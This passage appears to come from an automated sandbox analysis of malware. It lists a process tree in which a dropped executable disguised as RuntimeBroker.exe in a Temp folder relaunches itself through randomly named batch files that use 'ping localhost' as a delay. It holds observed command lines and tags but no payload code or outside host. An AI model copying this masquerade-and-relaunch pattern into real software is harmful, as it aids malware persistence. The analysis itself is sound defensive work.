        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        10⤵
        Executes dropped EXE
        
        PID:1332
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LVlA9hAbYjoG.bat" "
        11⤵
        
        PID:2820
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:412
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:2172
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1056
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        12⤵
        Executes dropped EXE
        
        PID:4896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5q7Zbq7Fr6vs.bat" "
        13⤵
        
        PID:408
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:2248
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:756
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        14⤵
        
        PID:3192
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        14⤵
        Executes dropped EXE
        
        PID:1616
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZGxfl5N3Kzqh.bat" "
        15⤵
        
        PID:4604
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:3700
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:2840
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        16⤵
        
        PID:1052
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        16⤵
        Executes dropped EXE
        
        PID:4408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MQrMEqM6CaYM.bat" "
        17⤵
        
        PID:1536
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        18⤵
        
        PID:2908
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        18⤵
        
        PID:4604
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        18⤵
        Runs ping.exe
        
        PID:952
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        18⤵
        Executes dropped EXE
        
        PID:3320
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zWBldorABWmY.bat" "
        19⤵
        
        PID:4216
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        20⤵
        
        PID:2404
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        20⤵
        
        PID:4712
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1600
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        20⤵
        Executes dropped EXE
        
        PID:2216
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EBl9MWsIgGNN.bat" "
        21⤵
        
        PID:3472
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        22⤵
        
        PID:2752
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        22⤵
        
        PID:920
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        22⤵
        
        PID:2508
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        22⤵
        Executes dropped EXE
        
        PID:4720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3UnZxCIxYcdS.bat" "
        23⤵
        
        PID:2932
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        24⤵
        
        PID:3120
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        24⤵
        
        PID:1548
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        24⤵
        Runs ping.exe
        
        PID:2240
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        24⤵
        Executes dropped EXE
        
        PID:3132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mkoNT50mEjUe.bat" "
        25⤵
        
        PID:3240
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        26⤵
        
        PID:3692
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        26⤵
        
        PID:1248
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        26⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1768
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        26⤵
        Executes dropped EXE
        
        PID:2796
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xf5HHUxTDn74.bat" "
        27⤵
        
        PID:3872
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        28⤵
        
        PID:5068
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        28⤵
        
        PID:5012
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        28⤵
        Runs ping.exe
        
        PID:1560
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        28⤵
        Executes dropped EXE
        
        PID:4940
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\g3uBSupC0UPp.bat" "
        29⤵
        
        PID:4720
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        30⤵
        
        PID:3352
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        30⤵
        
        PID:3444
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        30⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1488
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        30⤵
        Executes dropped EXE
        
        PID:2896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\E1GxOopCF1BU.bat" "
        31⤵
        
        PID:1908
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        32⤵
        
        PID:2092
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        32⤵
        
        PID:992
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        32⤵
        
        PID:640
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        32⤵
        Executes dropped EXE
        
        PID:3176
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jdO41ftoF7YY.bat" "
        33⤵
        
        PID:1588
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        34⤵
        
        PID:4012
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        34⤵
        
        PID:5084
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        34⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4672
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        34⤵
        Executes dropped EXE
        
        PID:2180
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YBdnN4WTloWn.bat" "
        35⤵
        
        PID:3176
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        36⤵
        
        PID:1500
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        36⤵
        
        PID:2380
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        36⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:652
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        36⤵
        Executes dropped EXE
        
        PID:2856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JF5XeAxTWP90.bat" "
        37⤵
        
        PID:3612
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        38⤵
        
        PID:1056
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        38⤵
        
        PID:1652
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        38⤵
        Runs ping.exe
        
        PID:1164
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        38⤵
        Executes dropped EXE
        
        PID:1008
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ra5ONcVD0CFT.bat" "
        39⤵
        
        PID:4560
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        40⤵
        
        PID:1884
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        40⤵
        
        PID:912
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        40⤵
        Runs ping.exe
        
        PID:4236
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        40⤵
        Executes dropped EXE
        
        PID:3528
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CacA2McMymvL.bat" "
        41⤵
        
        PID:3968
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        42⤵
        
        PID:3172
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        42⤵
        
        PID:4272
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        42⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:956
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        42⤵
        Executes dropped EXE
        
        PID:4084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hrbwLweuTADm.bat" "
        43⤵
        
        PID:1960
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        44⤵
        
        PID:2796
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        44⤵
        
        PID:1860
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        44⤵
        Runs ping.exe
        
        PID:4764
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        44⤵
        Executes dropped EXE
        
        PID:2648
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SNAooC2dSkuv.bat" "
        45⤵
        
        PID:1060
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        46⤵
        
        PID:3004
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        46⤵
        
        PID:4212
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        46⤵
        
        PID:924
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        46⤵
        Executes dropped EXE
        
        PID:1740
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kpWPKiQGkXV1.bat" "
        47⤵
        
        PID:3960
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        48⤵
        
        PID:1452
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        48⤵
        
        PID:4008
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        48⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5056
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        48⤵
        
        PID:4180
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XPqQsnb5e4p3.bat" "
        49⤵
        
        PID:3924
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        50⤵
        
        PID:732
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        50⤵
        
        PID:1824
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        50⤵
        
        PID:4856
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        50⤵
        
        PID:2724
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BVImh6o8mBYg.bat" "
        51⤵
        
        PID:4728
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        52⤵
        
        PID:1560
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        52⤵
        
        PID:4180
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        52⤵
        
        PID:1792
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        52⤵
        
        PID:4764
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZxMjn9Jtop5M.bat" "
        53⤵
        
        PID:732
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        54⤵
        
        PID:236
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        54⤵
        
        PID:1536
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        54⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1508
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        54⤵
        
        PID:2680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1Atct9faLxA6.bat" "
        55⤵
        
        PID:2348
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        56⤵
        
        PID:2164
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        56⤵
        
        PID:1504
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        56⤵
        Runs ping.exe
        
        PID:2504
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        56⤵
        
        PID:4180
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iw2XXYGuo9rt.bat" "
        57⤵
        
        PID:2160
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        58⤵
        
        PID:3504
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        58⤵
        
        PID:4492
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        58⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1012
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        58⤵
        
        PID:1020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\o7hZCUmn0SlJ.bat" "
        59⤵
        
        PID:4644
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        60⤵
        
        PID:1832
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        60⤵
        
        PID:4304
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        60⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4816
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        60⤵
        
        PID:4084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8aLLvHXSov8D.bat" "
        61⤵
        
        PID:3176
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        62⤵
        
        PID:2504
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        62⤵
        
        PID:2796
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        62⤵
        
        PID:2096
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        62⤵
        
        PID:2412
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ryPhLnIq0XvI.bat" "
        63⤵
        
        PID:4808
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        64⤵
        
        PID:1448
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        64⤵
        
        PID:2160
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        64⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4020
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        64⤵
        
        PID:3056
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jBfHtcPlAfGW.bat" "
        65⤵
        
        PID:1760
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        66⤵
        
        PID:2096
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        66⤵
        
        PID:652
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        66⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3580
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        66⤵
        
        PID:3460
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uqs6moYHIZfM.bat" "
        67⤵
        
        PID:4808
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        68⤵
        
        PID:1168
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        68⤵
        
        PID:4788
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        68⤵
        
        PID:3904
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        68⤵
        
        PID:1840
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kl0WTbNVkCo3.bat" "
        69⤵
        
        PID:3136
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        70⤵
        
        PID:4728
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        70⤵
        
        PID:1232
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        70⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4540
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        70⤵
        
        PID:412
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bcI7iWvi950X.bat" "
        71⤵
        
        PID:3176
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        72⤵
        
        PID:1164
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        72⤵
        
        PID:3968
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        72⤵
        
        PID:4864
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        72⤵
        
        PID:3532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fuOjYNME3f23.bat" "
        73⤵
        
        PID:1512
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        74⤵
        
        PID:972
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        74⤵
        
        PID:2920
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        74⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4612
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        74⤵
        
        PID:4024
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EZ9bzUEAt1VF.bat" "
        75⤵
        
        PID:4216
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        76⤵
        
        PID:2200
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        76⤵
        
        PID:2040
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        76⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1972
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        76⤵
        
        PID:5060
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6Z1ORX4xGw8F.bat" "
        77⤵
        
        PID:3164
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        78⤵
        
        PID:2876
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        78⤵
        
        PID:3152
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        78⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3664
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        78⤵
        
        PID:2264
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\t6Xou5JaCwre.bat" "
        79⤵
        
        PID:5068
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        80⤵
        
        PID:3896
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        80⤵
        
        PID:4216
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        80⤵
        
        PID:2200
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        80⤵
        
        PID:4992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AujjsGiaYgZD.bat" "
        81⤵
        
        PID:4728
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        82⤵
        
        PID:2540
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        82⤵
        
        PID:3932
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        82⤵
        Runs ping.exe
        
        PID:588
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        82⤵
        
        PID:3220
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FM3B9H8KURll.bat" "
        83⤵
        
        PID:4160
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        84⤵
        
        PID:1560
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        84⤵
        
        PID:1548
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        84⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4644
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        84⤵
        
        PID:2144
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sXEeE9MV892R.bat" "
        85⤵
        
        PID:2164
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        86⤵
        
        PID:3520
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        86⤵
        
        PID:4212
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        86⤵
        
        PID:3744
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        86⤵
        
        PID:3916
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8eI9zKVxq9m2.bat" "
        87⤵
        
        PID:3500
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        88⤵
        
        PID:3440
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        88⤵
        
        PID:3096
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        88⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5052
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        88⤵
        
        PID:1248
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wQSaQ4GxPEO1.bat" "
        89⤵
        
        PID:1660
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        90⤵
        
        PID:3604
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        90⤵
        
        PID:3480
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        90⤵
        Runs ping.exe
        
